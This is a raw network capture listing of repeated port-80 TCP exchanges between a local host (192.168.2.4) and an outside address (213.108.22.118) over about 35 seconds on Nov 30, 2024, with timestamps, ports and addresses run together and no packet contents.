                                        Nov 30, 2024 22:38:41.357219934 CET5012280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:41.358067989 CET5012380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:41.358067989 CET5012180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:41.358220100 CET4992580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:41.477777004 CET8050122213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:41.477879047 CET5012280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:41.478179932 CET8050123213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:41.478275061 CET5012380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:41.478455067 CET5012380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:41.598381996 CET8050123213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:41.826523066 CET5012380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:41.946573973 CET8050123213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:41.946799040 CET8050123213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:41.946804047 CET8050123213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:42.342922926 CET5012480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:42.343182087 CET5012380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:42.462929010 CET8050124213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:42.463017941 CET5012480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:42.463165045 CET5012480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:42.467839956 CET5012580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:42.506742001 CET8050123213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:42.557188034 CET8050123213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:42.557239056 CET5012380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:42.583791018 CET8050124213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:42.587712049 CET8050125213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:42.589046955 CET5012580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:42.589046955 CET5012580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:42.709214926 CET8050125213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:42.812812090 CET5012480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:42.933384895 CET8050124213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:42.933396101 CET8050124213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:42.935781002 CET5012580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:43.055767059 CET8050125213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:43.055790901 CET8050125213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:43.055851936 CET8050125213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:43.778281927 CET8050124213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:43.826306105 CET5012480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.274784088 CET8050125213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:44.279607058 CET8050124213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:44.301315069 CET8050125213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:44.301372051 CET5012580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.322793961 CET8050125213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:44.322840929 CET5012580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.326313019 CET5012480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.387223959 CET8050124213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:44.387276888 CET5012480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.439598083 CET5012480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.439785957 CET5012580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.439995050 CET5012680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.559732914 CET8050124213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:44.559796095 CET5012480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.559851885 CET8050126213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:44.559928894 CET5012680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.560159922 CET5012680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.560194969 CET8050125213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:44.560250998 CET5012580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:44.680427074 CET8050126213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:44.904833078 CET5012680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:45.026685953 CET8050126213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:45.026705027 CET8050126213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:45.026716948 CET8050126213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:45.877933025 CET8050126213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:45.998467922 CET5012680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:46.110996962 CET8050126213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:46.111259937 CET5012680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:46.231432915 CET8050126213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:46.231501102 CET5012680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:46.235066891 CET5012780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:46.355068922 CET8050127213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:46.355149984 CET5012780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:46.355328083 CET5012780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:46.475239992 CET8050127213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:46.703022003 CET5012780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:46.824052095 CET8050127213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:46.824065924 CET8050127213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:46.824198961 CET8050127213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:48.733278990 CET8050127213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:48.779501915 CET5012780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:48.976042986 CET8050127213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.029628992 CET5012780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.109190941 CET5012780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.109194994 CET5012880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.229454041 CET8050128213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.229988098 CET8050127213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.231806040 CET5012780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.231803894 CET5012880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.231941938 CET5012880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.296263933 CET5012980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.296381950 CET5012880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.351845980 CET8050128213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.416203022 CET8050129213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.419863939 CET5013080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.420020103 CET5012980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.420145988 CET5012980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.458813906 CET8050128213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.539983034 CET8050130213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.540016890 CET8050129213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.540334940 CET5013080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.540610075 CET5013080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.660471916 CET8050130213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.779576063 CET5012980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.888988972 CET5013080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:49.900583982 CET8050129213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:49.900592089 CET8050129213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:50.009069920 CET8050130213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:50.009078026 CET8050130213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:50.009108067 CET8050130213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:50.360714912 CET8050128213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:50.360774040 CET5012880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:50.853049994 CET8050129213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:50.924582005 CET8050130213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:51.060770988 CET5013080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.060770035 CET5012980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.109532118 CET8050129213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:51.168066025 CET8050130213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:51.248265982 CET5013080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.248265028 CET5012980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.291944981 CET5013080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.291950941 CET5012980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.292227030 CET5013180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.412128925 CET8050131213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:51.412142992 CET8050130213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:51.412292004 CET5013080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.412292004 CET5013180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.412508011 CET5013180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.412584066 CET8050129213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:51.412925005 CET5012980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.532490969 CET8050131213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:51.764027119 CET5013180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:51.884109974 CET8050131213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:51.884121895 CET8050131213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:51.884134054 CET8050131213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:53.794708014 CET8050131213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:53.842001915 CET5013180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:54.036010981 CET8050131213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:54.036274910 CET5013180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:54.156734943 CET8050131213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:54.156802893 CET5013180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:54.156805038 CET5013280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:54.276696920 CET8050132213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:54.276793003 CET5013280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:54.276968956 CET5013280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:54.397083044 CET8050132213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:54.624906063 CET5013280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:54.745162964 CET8050132213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:54.745242119 CET8050132213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:54.745768070 CET8050132213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:55.527643919 CET8050132213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:55.715298891 CET5013280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:55.775888920 CET8050132213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:55.857635975 CET5013280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.081845999 CET5013280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.082387924 CET5013380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.124624014 CET5013480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.202085018 CET8050132213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.202147007 CET5013280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.202307940 CET8050133213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.202367067 CET5013380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.244518995 CET8050134213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.244596004 CET5013480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.244832039 CET5013480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.252785921 CET5013580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.364665985 CET8050134213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.372680902 CET8050135213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.372769117 CET5013580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.372996092 CET5013580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.492810011 CET8050135213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.592286110 CET5013480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.712155104 CET8050134213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.712271929 CET8050134213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.717250109 CET5013580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:56.837315083 CET8050135213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.837331057 CET8050135213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:56.837346077 CET8050135213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:57.642132998 CET8050134213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:57.685779095 CET5013480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:57.893572092 CET8050134213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:57.935777903 CET5013480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:00.734528065 CET8050135213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:00.952929020 CET5013580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:00.976169109 CET8050135213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:01.060853958 CET5013580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:01.104515076 CET5013480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:01.104516029 CET5013580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:01.104901075 CET5013680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:01.224848032 CET8050134213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:01.224967957 CET8050136213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:01.225076914 CET5013480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:01.225133896 CET5013680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:01.225245953 CET5013680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:01.225337982 CET8050135213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:01.225588083 CET5013580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:01.345175028 CET8050136213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:01.576545954 CET5013680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:01.696619034 CET8050136213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:01.696651936 CET8050136213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:01.696765900 CET8050136213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:02.547854900 CET8050136213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:02.592037916 CET5013680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:02.787024021 CET8050136213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:02.888999939 CET5013680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:02.908442020 CET5013780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:02.911084890 CET5013880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:03.028381109 CET8050137213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:03.028925896 CET5013780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:03.030997038 CET8050138213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:03.031205893 CET5013880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:03.031332970 CET5013880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:03.151243925 CET8050138213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:03.389153004 CET5013880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:03.614351988 CET8050138213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:03.614360094 CET8050138213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:03.636627913 CET8050138213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:04.365993977 CET8050138213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:04.476015091 CET5013880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:04.608130932 CET8050138213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:04.657439947 CET5013880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:04.801709890 CET5013680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:04.803795099 CET5013880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:04.803800106 CET5013980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:04.923723936 CET8050139213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:04.923904896 CET8050138213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:04.923973083 CET5013980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:04.924962044 CET5013880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:04.930932045 CET5013980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:05.050802946 CET8050139213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:05.279747009 CET5013980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:05.399873018 CET8050139213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:05.399883986 CET8050139213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:05.399902105 CET8050139213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:06.219460964 CET8050139213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:06.279591084 CET5013980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:06.464288950 CET8050139213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:06.592087030 CET5013980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:06.592628002 CET5013980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:06.592953920 CET5014080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:06.713371992 CET8050140213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:06.713499069 CET8050139213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:06.713620901 CET5013980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:06.713624954 CET5014080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:06.713848114 CET5014080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:06.833920956 CET8050140213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:07.060939074 CET5014080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:07.181107044 CET8050140213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:07.181123018 CET8050140213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:07.181132078 CET8050140213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:07.921391010 CET5014180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:07.921397924 CET5014080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.011929035 CET8050140213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.012049913 CET5014080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.041444063 CET8050141213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.041531086 CET5014180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.041716099 CET8050140213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.041727066 CET5014180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.043256998 CET5014080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.047003031 CET5014280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.161588907 CET8050141213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.166941881 CET8050142213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.167066097 CET5014280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.167404890 CET5014280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.287379026 CET8050142213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.389142990 CET5014180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.509169102 CET8050141213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.509253979 CET8050141213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.514071941 CET5014280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:08.634216070 CET8050142213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.634232998 CET8050142213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:08.634243965 CET8050142213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:09.323159933 CET8050141213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:09.389000893 CET5014180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.417305946 CET8050142213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:09.555071115 CET8050141213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:09.592158079 CET5014280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.664366961 CET8050142213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:09.779613972 CET5014180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.779721022 CET5014280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.795995951 CET5014180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.796214104 CET5014280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.796363115 CET5014380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.918868065 CET8050143213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:09.919053078 CET5014380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.919248104 CET5014380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.920785904 CET8050141213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:09.920825958 CET8050142213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:09.920840979 CET5014180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:09.920892954 CET5014280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:10.039354086 CET8050143213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:10.264081001 CET5014380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:10.384076118 CET8050143213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:10.384147882 CET8050143213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:10.384157896 CET8050143213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:11.277532101 CET8050143213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:11.357749939 CET5014380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:11.520231009 CET8050143213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:11.521744013 CET5014380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:11.641942024 CET8050143213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:11.645081997 CET5014380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:11.752216101 CET5014480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:11.872153044 CET8050144213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:11.872266054 CET5014480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:11.884919882 CET5014480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:12.004926920 CET8050144213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:12.233700037 CET5014480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:12.353853941 CET8050144213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:12.353868961 CET8050144213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:12.353879929 CET8050144213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:13.124336004 CET8050144213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:13.265002966 CET5014480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:13.368362904 CET8050144213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:13.451515913 CET5014480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:13.495866060 CET5014480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:13.495870113 CET5014580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:13.616431952 CET8050145213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:13.616441011 CET8050144213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:13.616569996 CET5014480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:13.616575003 CET5014580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:13.616782904 CET5014580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:13.736773968 CET8050145213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:13.967295885 CET5014580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:14.087402105 CET8050145213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:14.087426901 CET8050145213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:14.087431908 CET8050145213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:14.616270065 CET5014680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:14.616871119 CET5014580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:14.736349106 CET8050146213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:14.737122059 CET8050145213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:14.737153053 CET5014680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:14.739980936 CET5014680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:14.740216970 CET5014580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:14.859986067 CET8050146213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:14.900113106 CET5014780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:15.020277977 CET8050147213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:15.024203062 CET5014780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:15.025722980 CET5014780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:15.095664024 CET5014680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:15.146017075 CET8050147213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:15.216206074 CET8050146213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:15.216223001 CET8050146213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:15.376386881 CET5014780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:15.496475935 CET8050147213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:15.496484995 CET8050147213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:15.496520042 CET8050147213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:16.038455009 CET8050146213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:16.092159986 CET5014680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.230144024 CET8050147213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:16.289685011 CET8050146213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:16.293091059 CET5014780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.389034033 CET5014680192.168.2.4213.108.22.118
